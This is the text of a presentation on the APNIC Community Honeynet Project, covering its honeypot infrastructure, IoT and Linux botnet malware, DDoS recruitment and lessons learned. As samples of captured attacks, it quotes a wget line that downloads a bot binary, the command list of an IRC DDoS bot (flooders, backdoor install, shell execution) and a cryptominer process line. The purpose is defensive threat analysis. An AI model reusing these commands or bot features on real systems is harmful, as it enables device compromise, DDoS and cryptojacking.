The document discusses observations from the APNIC Community Honeynet Project, including Linux/Unix malware targeting servers and IoT devices, and lessons learned. Some key observations are the prevalence of Linux/Unix malware like Mirai that targets exposed devices with weak credentials. Honeypots captured login attempts and payloads downloaded from command and control servers. Lessons include the need to patch systems, use strong unique credentials, and monitor for infections.
5. 5
5
APNIC Community Honeynet Project
• Context
– Educational – using honeypots for understanding network security attacks / threats, part
of our network security training
– Situational awareness, the bigger picture, cooperation with other stakeholders, tools (i.e.
MISP threat sharing platform, Wireshark, Suricata, etc )
• Collaboration
– Partners deploy honeypots, APNIC runs the backend
– Information collected among partners & threat sharing*
• Outcomes
– More than 50 distributed honeypots* in AP region since 2017
– Share threat information for APNIC members, partners (i.e CERTs/CSIRTs, Network
Operators)
• https://blog.apnic.net/2020/07/09/apnic-community-honeynet-project-behind-
the-scenes/
• https://dash.apnic.net
5
6. 6
6
APNIC Community Honeypot
1. Purpose and Placement
o Research & Alerting – Internet
2. Type of Honeypots
o Cowrie, Dionaea, RDPHoney,
3. Deployment
– Community Honey Network (fork of Modern Honey Network)
– Partners & Self Hosting
4. Data Collection & Analysis & Action
– Logs, Visualization, Alert, Action (Incident Response)
– Elasticsearch, Kibana, Logstash, Beats
– Suricata IDS
– ElastAlert + Slack
5. Maintenance
– Ansible
– LibreNMS
Detection with Suricata Rulesets
Slack Alert
13. 13
13
Linux/Unix Malware
• Routers / IoT devices / Servers run Linux / Unix based OS
• Not new but pervasive
– Targets are exposed on the Internet (http, telnet, ssh)
– Unpatched / Unmonitored (i.e. no Anti Virus, firmware upgrades not applied)
– Default/Weak credentials
• Popular example – Mirai (ddos agent)
– Source code was shared publicly
– Many variants – josho, owari, masuta, sora etc
– Gafgyt
• Simple technique of infecting and spreading & persistence
• Interesting Scenarios
– Working from Home
– Servers / Hosting / Cloud
14. 14
14
Different Perspectives of a DDoS
My Network /
Infrastructure /
Host
Source
Target / Victim Perspective
Attacker Perspective
x
15. 15
15
Service & Attacker
Infrastructure
• Setting up the infrastructure
• Misconfigured services
– Servers - NTP, DNS, SSDP, etc
– Amplification attack
– Spoof source of request
– https://stats.cybergreen.net/
– https://www.shadowserver.org/what-we-
do/network-reporting/get-reports
• Active bot “recruitment”
– Internet exposed services
– Vulnerable devices
– Weak credentials
16. 18
18
source
Brute force:
Username: admin password:12345
Remote Code Execution via Web interface
Download Binary /
Execute
Scan and gain access
Connect to Command and Control C & C
“Recruitment Process”
wget http://37.x.2x.190:80/13747243572475/hx86_64
2
1
Attacker
17. 19
19
Telnet/SSH Honeypot (Cowrie)
• Emulates SSH / Telnet
– Allows attacker to log in
• Emulates Linux/Unix environment
– Captures command issued by attacker after
login
– Including download
• ”Look and Feel” of Linux/Unix server
and IoT devices
• Attract certain class of attacks
– Scan for SSH/Telnet
– Bruteforce username/password
– Login & execute payload(s)
• Ddos Agents & Cryptominers
– Based on post-login activities and binary
collected
Mirai sample – 2016
23. 25
* Non-spoof / non-root attacks: (can run on all bots) *
* STD <ip> <port> <time> = A non spoof UDP HIV STD flooder *
* HOLD <host> <port> <time> = A vanilla TCP connection flooder *
* JUNK <host> <port> <time> = A vanilla TCP flooder (modded) *
* UNKNOWN <target> <port, 0 for random> <packet size, 0 for random> <secs> = Another non-
spoof udp flooder
* HTTP <method> <target> <port> <path> <time> <power> = An extremely powerful HTTP flooder
* *
* Spoof / root attacks: *
* DNS <target IP> <port> <reflection file url> <forks> <pps limiter, -1 for no limit> <time> = DNS
amplification flooder, use with caution
* BLACKNURSE <target ip> <secs> = An ICMP flooder that will crash most firewalls, causing them
to drop packets.
* *
* Bot commands: *
* AK-47SCAN <ON/OFF> = Toggles scanner. Started automatically. *
* GETIP <iface> = gets the IP address from an interface *
* FASTFLUX <iface> <ip> <port> = starts a proxy to a port on another ip to an interface (same port)
* RNDNICK = Randomizes knight nickname *
* NICK <nick> = Changes the nick of the client *
* SERVER <server> = Changes servers *
* GETSPOOFS = Gets the current spoofing *
* SPOOFS <subnet> = Changes spoofing to a subnet *
* DISABLE = Disables all packeting from the knight *
* ENABLE = Enables all packeting from the knight *
* KILL = Kills the knight *
* GET <http address> <save as> = Downloads a file off the web *
* VERSION = Requests version of knight *
* KILLALL = Kills all current packeting *
* HELP = Displays this *
* IRC <command> = Sends this command to the server *
* SH <command> = Executes a command *
* BASH <command> = Run a bash command *
* ISH <command> = Interactive SH (via privmsg) *
* SHD <command> = Daemonize command *
* INSTALL <http://server/bin> = Install binary (via wget) *
* BINUPDATE <http://server/bin> = Update a binary (via wget) *
* LOCKUP <http://server/bin> = Kill telnet, install a backdoor! *
* *
Source code of IRC based bot
32. 36
36
www-data 17838 0.0 0.0 4452 636 ? S
Mar20 0:00 sh -c /bin/bash -i -c '( while true ; do
/var/www/[truncated]default/files/media-icons/xm2sg
-l /var/www/[truncated]/files/media-icons/out.txt -o
pool.minexmr.com:4444 -u
49DmzgK76Bo8WUa4LzTMs9TuT4Pj5FwM4FKuaN
R1LmNvSPbPcTFi1ZsbVjJcQDY5hZ9i18A88g86Tfd
Xi83P4uEoGyD5eTc.0+10000 -k >&
/dev/udp/127.0.0.1/1 0>&1 ; if [ ! -f
/var/www/[truncated]/files/media-icons/xm2sg ] || [ $?
-eq 126 ]; then break; fi; sleep 1 ; done )
33. 37
37
Analysis - Interesting indicators
• IP addresses of host for initial access, run script to download
binary/malware
– Normally compromised systems
• IP addresses of host serving binary/malware + other artefacts
• IP addresses/domains of command and control
• Binaries, scripts, malware samples, source code (+ hashes)
• Ssh keys, webshells, Group names, irc #channels
• Miner related information
• Correlate with other observations, reports, etc
35. 39
39
Lessons Learned
• Context how can we “ improve” security ?
• Bad Practices
o Telnet enabled by default on devices
o Weak or default credentials not removed
o Services not developed securely
o Services not deployed securely (i.e. management interfaces
shouldn’t be exposed on the Internet)
o No action upon notification (not our device, it is the customers)
• Miscreants will exploit the weaknesess & monetize
36. 45
45
Source IP from TO
2020-10-16T06:53:37.404513Z - cowrie : Traffic from IP
address: x.z.y.56 src_port: 33903 dest_port: 23 ASN
Info: XYZ , 38201 , x.z.y.0/21
AbuseIPDB
37. 46
46
Back to the drawing Board?
• Keeping the Internet safe and secure for _everyone_
• Education
– Users, operators, developers
• Governance
– Incident Response
– Roles and responsibilities
– Accountabilities